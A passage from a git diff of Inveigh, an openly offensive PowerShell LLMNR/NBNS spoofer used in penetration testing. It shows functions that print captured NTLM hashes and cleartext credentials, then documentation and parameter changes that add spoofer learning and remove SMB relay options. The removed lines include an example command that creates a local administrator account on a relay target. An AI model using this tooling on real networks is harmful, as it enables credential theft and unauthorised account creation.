hashes. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($Console -or $PSBoundParameters.Count -eq 0) +{ + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + +} + +if($Log) +{ + Write-Output $inveigh.log +} + +if($NTLMv1) +{ + Write-Output $inveigh.NTLMv1_list +} + +if($NTLMv1Unique) +{ + $inveigh.NTLMv1_list.Sort() + + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output $unique_NTLMv1 + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + +} + +if($NTLMv1Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} + +if($NTLMv2) +{ + Write-Output $inveigh.NTLMv2_list +} + +if($NTLMv2Unique) +{ + $inveigh.NTLMv2_list.Sort() + + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + +} + +if($NTLMv2Usernames) +{ + Write-Output $inveigh.NTLMv2_username_list +} + +if($Cleartext) +{ + Write-Output $inveigh.cleartext_list +} + +if($CleartextUnique) +{ + Write-Output $inveigh.cleartext_list | Get-Unique +} + +if($Learning) +{ + Write-Output $inveigh.valid_host_list +} + +} + +function Watch-Inveigh +{ +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. +#> + +if($inveigh.tool -ne 1) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + { + Write-Output "Press any key to stop real time console output" + $inveigh.console_output = $true + + :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + Start-Sleep -m 5 + } + + } + else + { + Write-Output "Inveigh isn't running" + } + +} +else +{ + Write-Output "Watch-Inveigh cannot be used with current external tool selection" +} + +} + +function Clear-Inveigh +{ +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> + +if($inveigh) +{ + + if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" + } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + +} + +}
\ No newline at end of file diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 1e5ea3f..8c7437f 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -16,12 +16,12 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea Run time control .PARAMETER IP -Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if -the SpooferIP parameter is not set. +Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the +SpooferIP parameter is not set. .PARAMETER SpooferIP -Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a -system other than the Inveigh host. +IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other +than the Inveigh host. .PARAMETER SpooferHostsReply Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. @@ -35,6 +35,19 @@ Default = All: Comma separated list of source IP addresses to respond to when sp .PARAMETER SpooferIPsIgnore Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +.PARAMETER SpooferLearning +Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out +LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the +hostname to a spoofing blacklist. + +.PARAMETER SpooferLearningDelay +(Interger) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through +SpooferLearning. + +.PARAMETER SpooferLearningInterval +Default = 30 Minutes: (Interger) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a +hostname that has already been checked if SpooferLearning is enabled. + .PARAMETER SpooferRepeat Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. @@ -43,13 +56,13 @@ challenge/response has been captured. Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. .PARAMETER LLMNRTTL -Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. .PARAMETER NBNS Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. .PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +Default = 165 Seconds: NBNS TTL in seconds for the response packet. .PARAMETER NBNSTypes Default = 00,20: Comma separated list of NBNS types to spoof. @@ -65,36 +78,38 @@ the local store and attached to port 443. If the script does not exit gracefully in the cert store. .PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not -apply to wpad.dat requests. +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to +wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A +WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and +connecting to the root of the web server. .PARAMETER HTTPBasicRealm -Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. .PARAMETER HTTPDir -Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. +Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. .PARAMETER HTTPDefaultFile -Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used -for wpad.dat requests. +Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for +wpad.dat requests. .PARAMETER HTTPDefaultEXE -Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. +EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. .PARAMETER HTTPResponse -Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat -requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. +String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. .PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. +Valid application GUID for use with the ceriticate. .PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. +Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current +working directory and named Inveigh.pfx. .PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. -Setting to Anonymous can prevent browser login prompts. +Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. .PARAMETER WPADEmptyFile Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. @@ -102,20 +117,20 @@ Enabling this setting can reduce the amount of redundant wpad.dat requests. This using WPADIP, WPADPort, or WPADResponse. .PARAMETER WPADIP -Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADPort. +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. .PARAMETER WPADPort -Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADIP. +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. .PARAMETER WPADDirectHosts Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. .PARAMETER WPADResponse -Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and -WPADPort are set. Use PowerShell character escapes where necessary. +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. Use PowerShell character escapes where necessary. .PARAMETER SMB Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still @@ -123,38 +138,18 @@ direct targets to the host system's SMB server. Block TCP ports 445/139 or kill prevent login requests from being processed by the Inveigh host. .PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. This will only be used for non-relay captures. +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -.PARAMETER SMBRelay -Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. - -.PARAMETER SMBRelayTarget -IP address of system to target for SMB relay. - -.PARAMETER SMBRelayCommand -Command to execute on SMB relay target. - -.PARAMETER SMBRelayUsernames -Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and -domain\username format. - -.PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. - -.PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay - target after each packet is sent. - .PARAMETER ConsoleOutput Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. .PARAMETER ConsoleStatus -(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. .PARAMETER ConsoleUnique @@ -177,11 +172,11 @@ running Inveigh through a shell that does not return other output streams.Note t yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. .PARAMETER RunTime -(Integer) Set the run time duration in minutes. +(Integer) Run time duration in minutes. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. @@ -190,8 +185,9 @@ Default = Enabled: (Y/N) Enable/Disable the help messages at startup. (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .EXAMPLE Import-Module .\Inveigh.psd1;Invoke-Inveigh @@ -220,12 +216,7 @@ useful for sending traffic to a controlled Linux system on another subnet. .EXAMPLE Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>" -Execute specifying an HTTP redirect response. - -.EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay -target. +Execute specifying an HTTP redirect response. .NOTES 1. An elevated administrator or SYSTEM shell is needed. @@ -247,54 +238,51 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelay="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"), - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SpooferHostsReply="", - [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="", - [parameter(Mandatory=$false)][Array]$SpooferIPsReply="", - [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Array]$WPADDirectHosts="", - [parameter(Mandatory=$false)][Int]$ConsoleStatus="", - [parameter(Mandatory=$false)][Int]$LLMNRTTL="30", - [parameter(Mandatory=$false)][Int]$NBNSTTL="165", - [parameter(Mandatory=$false)][Int]$WPADPort="", - [parameter(Mandatory=$false)][Int]$RunTime="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS", - [parameter(Mandatory=$false)][String]$HTTPDefaultFile="", - [parameter(Mandatory=$false)][String]$HTTPDefaultEXE="", - [parameter(Mandatory=$false)][String]$HTTPResponse="", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", - [parameter(Mandatory=$false)][String]$WPADResponse="", - [parameter(Mandatory=$false)][String]$SMBRelayCommand="", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", + [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30", + [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "", + [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "", + [parameter(Mandatory=$false)][String]$HTTPResponse = "", + [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF", + [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d", + [parameter(Mandatory=$false)][String]$WPADResponse = "", [parameter(Mandatory=$false)][Switch]$Inspect, [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -314,30 +302,6 @@ if(!$SpooferIP) $SpooferIP = $IP } -if($SMBRelay -eq 'Y') -{ - - if(!$SMBRelayTarget) - { - throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" - } - - if(!$SMBRelayCommand) - { - throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" - } - - if($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse) - { - throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay" - } - elseif($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic') - { - throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay" - } - -} - if($HTTPDefaultFile -or $HTTPDefaultEXE) { @@ -383,47 +347,42 @@ if(!$inveigh) $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList } if($inveigh.running) { throw "Invoke-Inveigh is already running, use Stop-Inveigh" } -elseif($inveigh.relay_running) -{ - throw "Invoke-InveighRelay is already running, use Stop-Inveigh" -} $inveigh.sniffer_socket = $null -if($inveigh.HTTP_listener.IsListening) +if($inveigh.HTTP_listener.IsListening -and !$inveigh.relay_running) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } -$inveigh.console_queue = New-Object System.Collections.ArrayList -$inveigh.status_queue = New-Object System.Collections.ArrayList -$inveigh.log_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList -$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList -$inveigh.certificate_application_ID = $HTTPSCertAppID -$inveigh.certificate_thumbprint = $HTTPSCertThumbprint -$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList -$inveigh.console_output = $false -$inveigh.console_input = $true -$inveigh.file_output = $false -$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" -$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" -$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" -$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" -$inveigh.HTTP_response = $HTTPResponse -$inveigh.HTTP_directory = $HTTPDir -$inveigh.HTTP_default_file = $HTTPDefaultFile -$inveigh.HTTP_default_exe = $HTTPDefaultEXE -$inveigh.WPAD_response = $WPADResponse -$inveigh.challenge = $Challenge +if(!$inveigh.relay_running -or !$inveigh.unprivileged_running) +{ + $inveigh.console_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.log_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList + $inveigh.certificate_application_ID = $HTTPSCertAppID + $inveigh.certificate_thumbprint = $HTTPSCertThumbprint + $inveigh.console_output = $false + $inveigh.console_input = $true + $inveigh.file_output = $false + $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" + $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" + $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" +} + $inveigh.running = $true if($StatusOutput -eq 'Y') @@ -453,7 +412,7 @@ if($Inspect) $SMB = "N" } -if($Tool -eq 1) # Metasploit Interactive PowerShell +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension { $inveigh.tool = 1 $inveigh.output_stream_only = $true @@ -479,7 +438,7 @@ else $inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null -$firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} +$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} if($firewall_status) { @@ -491,14 +450,14 @@ $inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null if($LLMNR -eq 'Y') { - $inveigh.status_queue.Add("LLMNR Spoofing Enabled") > $null + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null - $LLMNR_response_message = "- spoofed response has been sent" + $LLMNR_response_message = "- response sent" } else { - $inveigh.status_queue.Add("LLMNR Spoofing Disabled") > $null - $LLMNR_response_message = "- LLMNR spoofing is disabled" + $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null + $LLMNR_response_message = "- LLMNR spoofer is disabled" } if($NBNS -eq 'Y') @@ -507,46 +466,74 @@ if($NBNS -eq 'Y') if($NBNSTypes.Count -eq 1) { - $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output Enabled") > $null + $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null } else { - $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output Enabled") > $null + $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null } $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null - $NBNS_response_message = "- spoofed response has been sent" + $NBNS_response_message = "- response sent" } else { - $inveigh.status_queue.Add("NBNS Spoofing Disabled") > $null - $NBNS_response_message = "- NBNS spoofing is disabled" + $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null + $NBNS_response_message = "- NBNS spoofer is disabled" +} + +if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) +{ + $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null + + if($SpooferLearningDelay -eq 1) + { + $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null + } + elseif($SpooferLearningDelay -gt 1) + { + $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null + } + + if($SpooferLearningInterval -eq 1) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null + } + elseif($SpooferLearningInterval -eq 0) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null + } + elseif($SpooferLearningInterval -gt 1) + { + $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null + } + } if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null + $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null } if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",") > $null + $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null } if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",") > $null + $inveigh.status_queue.Add("Spoofer IPs Reply = " + 